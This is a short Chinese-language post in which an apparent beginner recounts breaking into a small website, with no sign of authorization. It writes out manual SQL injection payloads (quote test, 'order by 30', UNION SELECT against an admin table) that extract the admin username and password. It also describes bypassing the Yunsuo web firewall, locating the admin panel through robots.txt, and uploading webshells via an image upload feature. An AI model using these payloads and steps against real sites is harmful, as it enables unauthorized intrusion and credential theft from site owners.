【萌新】记录一次渗透小站的过程
一开始接触该站
先随便翻阅了一些目录
发现在URL中 “/ProductView.asp?ID=1021 ” 这几个字段格外引人瞩目
于是 二话不说 看看有没有注入点
输入一个 ' 看一看 发现报错了!!!
然后惯例 and 1=1, and 1=11
发现存在云锁 突然想起来云锁存在一个绕过的漏洞 具体什么的百度一下看看吧!
从这里我们发现一个绕过的漏洞
直接用firefox的hackerbar试试吧!
存在注入点! 那么继续手注吧!
构造语句:ProductView.asp?ID=1021 order by 30 发现 30不报错 31报错 那么有30的字段
继续构造注入语句 :ProductView.asp?ID=1021UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
发现直接爆了出来
然后
ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,username,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
ProductView.asp?ID=1021 UNION SELECT 1,2,3,4,5,6,7,password,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from admin
运气不错 直接username password就试了出来
那么找下后台吧!
发现用了御剑 死都扫不出来
换个思路看看 robots.txt
试着试着 找到了 后台
不愧是天选之人
感觉都满顺利的
进入后台直接修改图片
发现可以直接上传sap文件 美滋滋、
上传了几个马子 发现都被云锁拦截了 最后快要放弃的时候 上传一个发现神奇的过了!
接下来发现想Net下 都不行 还是个菜鸡一个啊 还要继续学习
未完待续